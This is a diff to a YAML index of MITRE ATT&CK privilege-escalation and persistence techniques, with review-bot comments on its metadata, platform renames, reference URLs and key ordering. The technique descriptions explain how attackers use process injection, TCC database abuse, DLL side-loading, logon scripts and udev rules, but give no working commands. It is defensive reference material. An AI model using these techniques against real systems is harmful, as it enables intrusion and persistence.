+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22287,7 +22580,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22318,7 +22610,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22361,12 +22653,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22383,7 +22673,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -22442,7 +22732,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22524,12 +22813,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22626,7 +22914,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22740,7 +23027,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22810,7 +23096,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -22838,7 +23123,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22882,8 +23167,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -22919,7 +23202,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22938,12 +23221,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22993,12 +23275,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23031,9 +23312,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
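Review bot: the combined contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is replaced by two separate entries, with the `(Gurucul)` affiliation now attached only to Nilesh Dherange and both names appended after Arad Inbar rather than kept in place. Worth checking against the upstream technique page that the split and the dropped shared affiliation are the upstream correction and not an artefact of splitting the field on commas.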
@@ -23050,9 +23332,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
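Review bot: the platform list for T1098.002 replaces `Office 365` and `Google Workspace` with the single value `Office Suite` (version 2.1 to 2.2). Any index, filter or test selector that matches techniques by the old platform strings will silently stop including this technique, so check that the per-platform index generation recognises `Office Suite`; the same consolidation appears further down for T1078.004 and, as `Identity Provider`, for T1484.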
@@ -23098,7 +23379,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests:
- name: EXO - Full access mailbox permission granted to a user
@@ -23154,33 +23434,15 @@ privilege-escalation:
elevation_required: false
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
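Review bot: the new description uses the `|+` block indicator, which keeps the trailing blank line, so the value now ends in two newlines where the old double-quoted string ended in one, and sibling descriptions in this file use `|-`. It is valid YAML, but it makes rendered descriptions differ in trailing whitespace; if the generator controls the indicator, emitting `|-` or `|` consistently would be cleaner. The hunk also carries the upstream phrase `an overwrites file (if connected to an MDM)`, which reads as if `overrides` was intended; that is MITRE's wording and should be raised upstream rather than patched in this index.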
@@ -23188,6 +23450,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23195,7 +23459,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23225,7 +23489,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23271,7 +23534,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23316,8 +23579,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -23343,7 +23604,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23369,59 +23630,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
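Review bot: most of this hunk is a key-order change rather than a content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list are removed from the top of T1055.015 only to be re-added lower down in the next hunk. The substantive edits are the `modified` date (2022-05-11 to 2024-08-14), the added `(Citation: Hexacorn Listplanting)` with its matching reference entry, and the re-wrapped description text. Emitting keys in a fixed order from the generator would keep future diffs to the real changes.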
@@ -23438,6 +23668,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23452,21 +23685,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23511,9 +23775,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
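Review bot: for T1484 the platforms `Azure AD` and `SaaS` are both replaced by the single `Identity Provider` entry (version 3.0 to 3.1), so this is a removal of `SaaS` as well as a rename of `Azure AD`, while the `Active Directory` data sources that follow are unchanged. If anything selects tests for SaaS platforms from this index, this technique drops out of that selection, which is worth a sentence in the commit description.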
@@ -23570,8 +23833,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23580,7 +23843,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23622,7 +23884,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23647,12 +23909,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23692,8 +23953,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
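Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted above `x_mitre_contributors` here, while a later hunk for the same technique removes it (together with `x_mitre_modified_by_ref`) from its old position next to `object_marking_refs`, so for these two keys the net change is position only. The actual addition in this hunk is the contributor `Arun Seelagan, CISA`; the platform and version changes for T1078.004 follow in the next hunk.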
@@ -23701,13 +23964,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -23738,17 +24001,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -23811,7 +24071,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -23845,8 +24105,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -23855,6 +24115,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
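Review bot: the new `Malicious Life by Cybereason` reference carries a `#blog-subscribe` fragment on its URL, which anchors to the page's subscription widget rather than the article body; the bare article URL (everything before `#`) is the one to record. The citation key matches the `(Citation: Malicious Life by Cybereason)` added to the T1053.002 description, so the reference resolves.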
@@ -23867,7 +24131,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -23970,9 +24233,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
